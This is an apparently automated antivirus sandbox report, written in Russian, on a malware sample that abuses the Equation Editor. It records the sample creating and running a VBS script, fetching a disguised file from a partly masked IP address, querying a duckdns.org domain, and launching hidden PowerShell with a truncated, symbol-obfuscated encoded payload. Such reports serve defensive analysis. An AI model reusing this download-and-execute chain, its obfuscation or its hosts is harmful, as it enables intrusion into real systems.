Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\creambiscutlikebygirlsgood.vBS"
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\creambiscutlikebygirlsgood.vbs
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\i3nmat9z\config14[1].txt
Сетевая активность
Подключается к
- '19#.#.109.147':80
TCP
Запросы HTTP GET
- http://19#.#.109.147/98/creambiscutlikebygirlsgoodthingspic.gIF
UDP
- DNS ASK se######windows.duckdns.org
Другое
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J╕ ⤷ ֎ ☄ ✩Bs╕ ⤷ ֎ ☄ ✩Gk╕ ⤷ ֎ ☄ ✩bgBr╕ ⤷ ֎ ☄ ✩C╕ ⤷ ֎ ☄ ✩╕ ⤷ ֎ ☄ ✩PQ╕ ⤷ ֎ ☄ ✩g╕ ⤷ ֎ ☄ ✩Cc╕ ⤷ ֎ ☄ ✩a╕ ⤷ ֎ ☄ ✩B0╕ ⤷ ֎ ☄ ✩HQ╕ ⤷ ֎ ☄ ✩c╕ ⤷ ֎ ☄ ✩╕ ⤷ ֎ ☄ ✩6╕ ⤷ ֎ ☄ ✩C8╕ ⤷ ֎ ☄ ✩LwBz╕... (со скрытым окном)
